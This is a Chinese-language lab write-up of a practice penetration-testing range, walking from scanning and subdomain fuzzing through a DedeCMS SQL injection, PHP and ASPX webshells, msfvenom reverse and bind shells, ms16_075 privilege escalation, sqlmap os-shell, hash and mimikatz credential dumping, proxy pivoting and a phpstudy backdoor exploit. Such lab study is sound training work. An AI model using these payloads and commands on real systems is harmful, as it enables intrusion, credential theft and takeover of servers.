打靶日记(一) 完整的渗透测试实例
声明:此系列文章系个人记录打靶过程的文章,靶场为暗月师傅的靶场。这是第一篇。
前言
开一个新的分类“打靶日记(moon)”,这一个系列记录了我的打靶的日常,这系列大概是打了六七个暗月师傅的靶场。于是乎,我一一下载到本地进行搭建和攻击,包含了外部打点、权限提升、权限维持、内网横向渗透、域渗透等内容。这个是第一个靶场。
1.靶场介绍
本靶场存在四个 flag 把下载到的虚拟机环境导入到虚拟机,本靶场需要把网络环境配置好
1.1本靶场示意图

2. 信息收集
2.1.主机发现
1 | netdiscover -i eth0 -r 192.168.1.0/24 |

2.2masscan 端口扫描
(使用发包率10000的时候没扫出来)
1 | masscan -p 0-65535 192.168.1.134 --rate=1000 |

2.3Nmap进行端口信息探测
1 | nmap -sC -A 192.168.1.134 -p 135,49155,6588,21,3389,80,999,53,49154 -oA cc123-port |

2.4网站信息
1 | http://192.168.1.134:999/ |

1 | http://192.168.1.134/ |

1 | http://192.168.1.134:6588/ |

3.本地设置
3.1.绑定本地 hosts
1 | C:\Windows\System32\drivers\etc\hosts |

3.2设置本地网关

1 | vim /etc/resolv.conf |

4.收集子域名
4.1wfuzz穷举子域名
1 | wfuzz -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt -u cc123.com -H "Host:FUZZ.cc123.com" --hw 53 |

显示没有路由
在靶机配置DNS

修改hoset
1 | vim /etc/resolv.conf |

1 | wfuzz -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt -u cc123.com -H "Host:FUZZ.cc123.com" --hw 53 |
过滤掉53

5.子域名信息
Dedecms |
new.cc123.com |
|---|---|
kesionEDU |
www. cc123.com |
net |
ww2 cc123.com |
6.漏洞测试
6.1dedecms安全检测
查看版本号
1 | new.cc123.com/data/admin/ver.txt |

会员注册处有注入的漏洞
注册会员

添加分类

拿到cookie

放到脚本的cookie记事本中

执行脚本,指定网站
1 | python2 .\Dedecms_20150618_member_sqli.py http://new.cc123.com |

1 | 密文 812df726be884ddcfc41 解密:admin7788 |
在网站解密

得到密码之后,来到后台
1 | http://new.cc123.com/dede/login.php?gotopage=%2Fdede%2F |
输入账号密码之后登录:

在文件管理处上传webshell

添加一句话木马语句到图片中
1 | <?php @eval($_POST['garck']);?> |

上传文件
抓包修改后缀

1 | http://new.cc123.com/a/ma.php |
验证

下载中国蚁剑加载器
1 | https://github.com/AntSwordProject/AntSword-Loader |
初始化的时候未检测代码的时候会进行自动下载

连接一句话木马

7.提取服务器
在终端执行命令失败

发现.net的功能

上传.net的大马
访问地址:http://new.cc123.com/a/ASPXSpy2014.aspx
密码是:admin

可以执行cmd命令

7.1metasploit windows提权
生成msf的木马
1 | msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.133 lport=55555 -f exe >garck.exe |

上传至于服务器,发现上传的时候被拒绝

7.2扫描可写目录
上传扫描 目录可写 的脚本

开始检测

发现以下的目录是可写的

将msf生成的木马上传至于:
1 | c:\windows\debug\WIA\ |

开启msf的监听
打开msf控制端
Msfconsole

1 | 选择handler模块 |

7.3得到meterpreter
发现成功上线了

查看当前权限,发现为比较普通的iis用户权限

7.4检测能提权的漏洞
开始检测提权
使用模块查询是否可以提权
Background
检测可以用来提权的模块
1 | use post/multi/recon/local_exploit_suggester |

7.5ms16_075提权
开始提权
1 | 使用use exploit/windows/local/ms16_075_reflection_juicy |

9.测试ww2.cc123.com安全
9.1gobuster目录扫描
1 | gobuster dir -u http://ww2.cc123.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "aspx,html" -o ~/cc123/cc123.log |
扫描网站目录

http://ww2.cc123.com/admin 管理后台
http://ww2.cc123.com/editor 编辑器
经测试后台的密码是 cc123
9.2SQL注入拿下mssql服务器
登录:http://ww2.cc123.com/admin/Login.aspx
admin cc123
cc123 qweasd123

抓取数据包

保存到22.txt中
测试注入
1 | sqlmap -r 22.txt --dbms mssql -v 1 --batch |

列出库
1 | sqlmap -r 22.txt --dbms mssql -v 1 --dbs |

获取 **mssql shell **
1 | sqlmap -r 22.txt --dbms mssql -v 1 --os-shell |

10.多重网段内网渗透
10.1web服务器信息收集
10.1.1网卡信息
Ifconfig

查到两个IP:
10.10.10.128
192.168.1.134
10.1.2查看路由信息
1 | run get_local_subnets |

1 | Local subnet: 10.10.10.0/255.255.255.0 |
10.1.3哈希的获取
1 | run hashdump |

1 | Administrator:500:aad3b435b51404eeaad3b435b51404ee:1c933df09b600efabee0791aaccc43f2::: |
进程迁移到1568
1 | migrate 1568 |

10.1.4使用mimikatz获取明文
1 | 加载mimikatz |

1 | 搜索密码 |

整理结果
使用wdigest 或者tspkg

10.1.5添加路由进行内网渗透
1 | (绑定路由) |

1 | 查看绑定结果 |

Background
10.1.6启动 socks 代理
1 | use auxiliary/server/socks_proxy |

10.1.7修改 proxychains 配置文件
配置修改配置文件
1 | vim /etc/proxychains4.conf |

10.1.8使用proxychains 调用nmap扫描
1 | proxychains nmap -sT -Pn 10.10.10.145 |

10.2数据库服务器信息收集
10.2.1生成正向连接载荷
1 | msfvenom -p windows/meterpreter/bind_tcp LPORT=13777 -f exe > bind.exe |

连接数据库:
1 | server=WIN-JJU7KU45PN7;database=grcms_data;uid=sa;pwd=!@#a123..;database=master |

10.2.2mssql上传文件
上传生成的攻击载荷
(数据库的IP一定要对)

10.2.3执行文件并且获取session
执行
1 | exec master.dbo.xp_cmdshell 'C:/bind.exe' |

开始监听
1 | use exploit/multi/handler |

数据库服务器信息收集
网卡端口信息
os-shell 执行 netstat -ano 查看端口信息

网卡信息

查看进程ps

10.2.4进程迁移
1 | migrate 468 |

10.2.5加载mimikatz获取明文
1 | load mimikatz |


1 | creds_wdigest |

10.3渗透目标服务器
10.3.1添加路由
查看路由信息
1 | run get_local_subnets |

绑定IP
1 | run autoroute -s 10.10.1.0/24 |

1 | 查看绑定路由 run autoroute -p |

10.3.2phpstudy后门测试

在物理机将python添加到代理中
10.3.3python编写phpstudy后门exp
1 | #conding:utf-8 |
然后执行脚本尝试查看IP情况
1 | python phpstudy.py ipconfig |

10.3.4尝试写入shell
python phpstudy.py "echo ^<?php @eval($_POST[\"shell\"])?^>>c:\phpstudy\WWW\shell.php"

将中国菜刀添加到代理中

10.3.5连接后门

查看权限

10.3.6获取目标机子的session
将正向连接的木马文件复制到物理机,尝试通过中国菜刀进行上传与运行

1 | use exploit/multi/handler |

1 | 全部的sessions |

4个flages
一、
1 | c:\HwsHostMaster\wwwroot\ww2cc123_55m39g\web\upimg\flag.txt |
二、
1 | C:\users\Administrator\root.txt.txt |
三、
1 | C:\users\Administrator\root.txt |